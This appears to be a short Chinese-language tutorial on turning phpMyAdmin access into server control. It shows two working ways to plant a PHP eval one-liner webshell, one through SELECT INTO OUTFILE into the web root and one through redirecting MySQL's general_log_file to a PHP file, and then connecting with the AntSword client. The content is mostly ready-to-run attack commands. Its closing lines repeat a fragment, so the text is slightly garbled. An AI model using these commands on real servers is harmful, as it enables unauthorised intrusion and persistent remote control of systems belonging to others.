文章目录
- 拿到 phpMyAdmin 如何获取权限
- 1. outfile 写一句话木马
- 2. general_log_file 写一句话木马
拿到 phpMyAdmin 如何获取权限
1. outfile 写一句话木马
尝试使用SQL注入写文件的方式,执行 outfile 语句写入一句话木马。
select "<?php @eval($_REQUEST[6868])?>" into outfile "C:\\software\\phpstudy_pro\\WWW\\phpadmin.php";
蚁剑连接
2. general_log_file 写一句话木马
查看 general_log 是否开启。通过 show global variables like "%genera%"; 查看。
命令解析:查询全局系统变量中包含"genera"字符串的变量名及其对应的值。
GLOBAL VARIABLES:表示查询全局系统变量。
执行 set global general_log="on"; 打开。
通过 generali_log_file 写入一句话木马。
set global general_log_file=“网站绝对路径/文件名”;
命令解析:用于设置全局系统变量 general_log_file 的值为指定的文件路径。
general_log_file:表示需要修改的全局系统变量名称,它是MySQL数据库记录所有查询日志的文件名。- 执行该命令后,MySQL数据库会将全局系统变量
general_log_file的值设置为指定的文件路径。
SELECT "<?php @eval($_POST[1])?>"
general_log_file 会记录所有的查询语句,以原始的状态来显示,如果将 general_log 开关打开,general_log_file 设置为一个 php 文件,则查询的操作将会全部写入到 general_log_file 指定的文件,通过访问 general_log_file 指定的文件来获取 webshell。
使用蚁剑进行连接
general_log_file 指定的文件来获取 webshell。**
使用蚁剑进行连接
